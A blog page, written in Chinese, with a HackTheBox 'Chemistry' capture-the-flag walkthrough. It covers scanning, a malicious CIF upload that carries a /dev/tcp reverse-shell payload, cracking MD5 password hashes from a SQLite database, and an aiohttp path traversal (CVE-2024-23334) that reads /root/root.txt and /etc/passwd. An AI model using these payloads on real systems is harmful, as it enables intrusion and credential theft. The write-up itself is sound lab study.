<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="kting">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://ktkting.github.io/2024/12/16/chemistry/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="HackTheBox">
<meta property="og:type" content="article">
<meta property="og:title" content="Chemistry - Walkthrough">
<meta property="og:url" content="https://ktkting.github.io/2024/12/16/Chemistry/index.html">
<meta property="og:site_name" content="ktkting">
<meta property="og:description" content="HackTheBox">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://hackmd.io/_uploads/BJ194toVkg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rkhm0A24yx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H1g3RC3Ekl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SJtIJkaNJx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Sk8SdeaV1l.png">
<meta property="og:image" content="https://hackmd.io/_uploads/ryRwYeaEyx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/BJOAtxaVyx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/Hk4k9g6Nkl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/H1coJyTNyl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/r1y-dKsEJx.png">
<meta property="og:image" content="https://hackmd.io/_uploads/S1c0qFoEkg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/S1Vyiti4ye.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SJnyiYj41l.png">
<meta property="og:image" content="https://hackmd.io/_uploads/BJsgitiEyl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SkM9jts4Je.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rkXMjYjEJl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SyuSoKsVJe.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rkyQjFj4kg.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HkVQjFiNJe.png">
<meta property="og:image" content="https://hackmd.io/_uploads/SyeloZTN1g.png">
<meta property="og:image" content="https://hackmd.io/_uploads/HksXoFsNyl.png">
<meta property="og:image" content="https://hackmd.io/_uploads/B1umnbaV1l.png">
<meta property="og:image" content="https://hackmd.io/_uploads/rkjEjtsVyl.png">
<meta property="article:published_time" content="2024-12-16T09:33:37.000Z">
<meta property="article:modified_time" content="2024-12-16T11:25:55.080Z">
<meta property="article:author" content="kting">
<meta property="article:tag" content="HackTheBox">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hackmd.io/_uploads/BJ194toVkg.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/file.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/file.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/file.png">
    <!--- Page Info-->
    
    <title>
        
            Chemistry - Walkthrough -
        
        Ktkting&#39;s blog
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    
        
<script src="/js/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"ktkting.github.io","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":false,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推薦閱讀","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":true,"custom_message":"Ktkting's Blog"},"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"dark":"/images/alena-aenami-budapest.jpg","light":"/images/alena-aenami-quiet-1px.jpg"},"title":"Welcome to my blog","subtitle":{"text":["Learning record","Life record"],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.8rem","line_height":1},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"https://github.com/ktkting"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.7.1","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":{"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Tags":{"path":"/tags","icon":"fa-regular fa-tags"}}},"article_date_format":"YYYY-MM-DD","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



    <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        Ktkting&#39;s Blog
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [40,0],
                translateZ: 0,
                opacity: [0,1],
                filter: ['blur(5px)', 'blur(0px)'], // Starting from blurred to unblurred
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i,
            }).add({
                targets: '.ml13 .letter',
                translateY: [0,-40],
                opacity: [1,0],
                filter: ['blur(0px)', 'blur(5px)'], // Ending from unblurred to blurred
                easing: "easeInExpo",
                duration: 1200,
                delay: (el, i) => 100 + 30 * i,
                complete: function() {
                    hidePreloader(); // Call hidePreloader after the animation completes
                }
            });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/file.png">
                </a>
            
            <a class="logo-title" href="/">
                
                Ktkting&#39;s blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/tags"
                                        >
                                    <i class="fa-regular fa-tags fa-fw"></i>
                                    TAGS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/tags"
                        >
                            <span>
                                TAGS
                            </span>
                            
                                <i class="fa-regular fa-tags fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
                
                    
                    
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">4</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">11</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">Chemistry - Walkthrough</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/github.png">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">kting</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-12-16 17:33:37</span>
        <span class="mobile">2024-12-16 17:33:37</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-12-16 19:25:55</span>
            <span class="mobile">2024-12-16 19:25:55</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/HackTheBox/">HackTheBox</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h3 id="Step-1-Reconnaissance"><a href="#Step-1-Reconnaissance" class="headerlink" title="Step 1 - Reconnaissance"></a>Step 1 - Reconnaissance</h3><div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap -T4 -A 靶機IP</span><br></pre></td></tr></table></figure></div>

<p><code>-T4</code> - 針對 TCP 端口禁止動態掃描延遲超過 10ms<br><code>-A</code> - 全面系統檢測、啟用腳本檢測、掃描等<br>會發現有一個<code>port</code>為 5000 的網頁</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/BJ194toVkg.png"
                      alt="image"
                ></p>
<br>

<p>查看此網頁會發現到是一個登入和註冊密碼的網站<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/rkhm0A24yx.png"
                      alt="image"
                ></p>
<br>

<p>點擊 Register 申請一個新帳號<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/H1g3RC3Ekl.png"
                      alt="image"
                ></p>
<br>

<p>登入後，會如下圖這樣，可以上傳 CIF 檔案<br>點擊一下 here，會下載一個 example.cif 檔案</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SJtIJkaNJx.png"
                      alt="image"
                ></p>
<br>

<p>點開 example.cif 檔，如下圖:<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/Sk8SdeaV1l.png"
                      alt="image"
                ></p>
<br>
<br>

<h3 id="Step2-Information-Gathering"><a href="#Step2-Information-Gathering" class="headerlink" title="Step2 - Information Gathering"></a>Step2 - Information Gathering</h3><p>上網搜尋<code>cif cve</code>，查看腳本可以使用</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/ryRwYeaEyx.png"
                      alt="image"
                ></p>
<br>

<p>點擊第一個網站後，會發現有一個 PoC 的腳本可以使用</p>
<blockquote>
<h4 id="PoC-proof-of-concept"><a href="#PoC-proof-of-concept" class="headerlink" title="PoC(proof of concept)"></a>PoC(proof of concept)</h4><p>是為了顯示有漏洞的存在，在未修補前，同時可以做為攻擊者的突破口</p>
</blockquote>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/BJOAtxaVyx.png"
                      alt="image"
                ><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/Hk4k9g6Nkl.png"
                      alt="image"
                ></p>
<br>

<p>複製 example.cif，到新建一個 cif 檔案，使用 payload 並將<code>system()</code>修改成 Reverse Shell</p>
<blockquote>
<h4 id="system"><a href="#system" class="headerlink" title="system()"></a><code>system()</code></h4><p>是 Python 的 <code>os</code> 模組所提供的一個函式，用於在系統層級呼叫 shell 指令。當執行 os.system(“某指令”) 時，Python 會在底層呼叫作業系統的 shell 來執行該指令。執行完成後，<code>system()</code> 會回傳該指令執行完畢時的退出碼 (exit code)。</p>
</blockquote>
<blockquote>
<h4 id="詳細解析如下-ChatGPT-回答-："><a href="#詳細解析如下-ChatGPT-回答-：" class="headerlink" title="詳細解析如下(ChatGPT 回答)："></a>詳細解析如下(ChatGPT 回答)：</h4><p><code>system(&quot;/bin/bash -c &#39; ... &#39;&quot;)</code>：<br>使用 system() 函式呼叫 &#x2F;bin&#x2F;bash，並利用<code> -c</code> 選項執行接在後方的單引號內所包含的指令字串。<br><code>sh -i</code>：<br>啟動一個互動式的 sh 殼層（互動式代表可以透過輸入指令來操作該殼層）。<br><code>&gt;&amp; /dev/tcp/靶機IP/8888</code>：<br>此步驟透過 Bash 的特殊機制，將標準輸出（stdout）和標準錯誤輸出（stderr）重新導向到一個 TCP 連線(&#x2F;dev&#x2F;tcp&#x2F;靶機 IP&#x2F;8888)。<br>簡言之，這會嘗試與「靶機 IP」的「8888」埠建立 TCP 連線，並將所有殼層的執行結果輸出至該連線。<br><code>0&gt;&amp;1</code>：<br>將標準輸入（stdin）重新導向至標準輸出（stdout）。<br>透過前一步驟，我們的 stdout 已經指向遠端的 TCP 連線，因此這一步可以讓遠端的使用者透過該 TCP 連線所傳入的資料變成殼層的輸入，形成一個互動式控制通道。</p>
</blockquote>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">_space_group_magn.transform_BNS_Pp_abc  &#x27;a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+[&quot;__sub&quot; + &quot;classes__&quot;]) () if d.__name__ == &quot;BuiltinImporter&quot;][0].load_module (&quot;os&quot;).system (&quot;/bin/bash -c \&#x27;sh -i &gt;&amp; /dev/tcp/靶機IP/8888 0&gt;&amp;1&#x27;&quot;);0,0,0&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">_space_group_magn.number_BNS  62.448</span><br><span class="line">_space_group_magn.name_BNS  &quot;P  n&#x27;  m  a&#x27;  &quot;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/H1coJyTNyl.png"
                      alt="image"
                ></p>
<br>

<p>上傳新的 cif 檔案</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -nlvp 8888</span><br></pre></td></tr></table></figure></div>

<p><code>nc</code> - 可以用來檢測伺服器特定的連接埠（port）是否有開啟：<br><code> -n</code> - 直接使用 IP 地址，而不通 e 過 DNS。<br><code>-l</code> - 能轉變成監聽(listen)模式，成為伺服器<br><code>-v</code> - 顯示掃瞄訊息<br><code>-p &lt;通訊端口&gt;</code> - 設置本地主機使用的通訊端口。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/r1y-dKsEJx.png"
                      alt="image"
                ></p>
<br>
<br>

<h3 id="Step3-Lateral-Movement"><a href="#Step3-Lateral-Movement" class="headerlink" title="Step3 - Lateral Movement"></a>Step3 - Lateral Movement</h3><p><code>ls -la</code> - 列出靶機上目前有哪些目錄及檔案，會發現有一個名為<code>instance</code>的檔案<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/S1c0qFoEkg.png"
                      alt="image"
                ></p>
<br>

<p>進一步查看此檔案，又會發現到有一個<code>database.db</code>檔案<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/S1Vyiti4ye.png"
                      alt="image"
                ></p>
<br>

<blockquote>
<h4 id="SQLite"><a href="#SQLite" class="headerlink" title="SQLite"></a>SQLite</h4><p>是一種輕量級、獨立且無伺服器的關聯式資料庫管理系統（RDBMS），被廣泛用於嵌入式系統、行動應用程式和中小型網站。它易於安裝，需要較少的配置，並提供了一組用於管理和操作資料的強大功能。</p>
</blockquote>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sqlite3 database.db</span><br><span class="line">.table</span><br></pre></td></tr></table></figure></div>

<p><code>.table</code> - 查詢當前 db 的 table</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SJnyiYj41l.png"
                      alt="image"
                ></p>
<br>

<p><code>select * from user;</code> - 查詢<code>user</code>資料表內所有的資料</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/BJsgitiEyl.png"
                      alt="image"
                ></p>
<br>

<p>到<a class="link"   target="_blank" rel="noopener" href="https://crackstation.net/" >CrackStation <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>去把 MD5 Hash 密碼進行解碼<br><code>rose</code>的密碼可以解出來</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SkM9jts4Je.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh rose@靶機IP</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/rkXMjYjEJl.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whoami</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SyuSoKsVJe.png"
                      alt="image"
                ></p>
<br>

<p>查看目前有哪些檔案</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ls</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/rkyQjFj4kg.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat user.txt</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/HkVQjFiNJe.png"
                      alt="image"
                ></p>
<br>

<p>查看目前靶機網路連線情況</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ss -ant</span><br></pre></td></tr></table></figure></div>

<p><code>ss</code> - 輸出所有已經建立的 TCP 連線<br><code>-a</code> - 顯示所有的 sockets，包含傾聽狀態（listening）與非傾聽狀態（non-listening）<br><code>-n</code> - 以數值的方式顯示連接埠，不要解析為服務名稱<br><code>-t</code> - 只列出 TCP 的 sockets</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/SyeloZTN1g.png"
                      alt="image"
                ></p>
<br>

<p>查看目前伺服器的資料，確認此伺服器正運行在<code>aiohttp/3.9.1</code></p>
<blockquote>
<h4 id="curl"><a href="#curl" class="headerlink" title="curl"></a>curl</h4><p>是一款藉由指定的網路協定，以指令&#x2F;命令列方式來進行檔案傳輸的免費開源工具，最常使用它來測試網站 Web 的資訊傳輸、測試 API 是否可以正常運作等</p>
</blockquote>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl localhost@8080 --head</span><br></pre></td></tr></table></figure></div>

<p><code>-I</code>, <code>–head</code> - 只取得(顯示)連線的 Header 資料</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/HksXoFsNyl.png"
                      alt="image"
                ></p>
<br>

<p>上網搜尋<code>aiohttp/3.9.1</code>是否有漏洞，會發現它是一個<code>CVE-2024-23334</code></p>
<blockquote>
<h4 id="CVE-2024-23334"><a href="#CVE-2024-23334" class="headerlink" title="CVE-2024-23334"></a>CVE-2024-23334</h4><p>是在 aiohttp 函式庫中，發現此漏洞造成目錄遍歷攻擊的風險，特別是當 aiohttp 被用作網頁伺服器，且在設定靜態路由時未採取適當的安全防護措施時。</p>
</blockquote>
<blockquote>
<h4 id="Path-Traversal"><a href="#Path-Traversal" class="headerlink" title="Path Traversal"></a>Path Traversal</h4><p>是一種透過控制檔案變數來存取儲存在 Web 根目錄之外的檔案和目錄的攻擊。</p>
</blockquote>
<blockquote>
<h4 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h4><p>可以利用伺服器上的靜態目錄作為端點，透過<code>curl</code>發送請求及目錄遍歷的方式，最終讀取我想要看的檔案<br>範例: <code>curl -s --path-as-is &quot;http://localhost:8081/static/../../../../../etc/passwd&quot;</code></p>
</blockquote>
<br>

<p>查看<code>http://localhost:8080</code>的<code>source code</code>，會發現有一個靜態目錄名為<code>/assets</code></p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://localhost:8080</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/B1umnbaV1l.png"
                      alt="image"
                ></p>
<br>

<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -s --path-as-is http://localhost:8080/assets/../../../../../root/root.txt</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://hackmd.io/_uploads/rkjEjtsVyl.png"
                      alt="image"
                ></p>
<h3 id="References"><a href="#References" class="headerlink" title="References"></a>References</h3><ul>
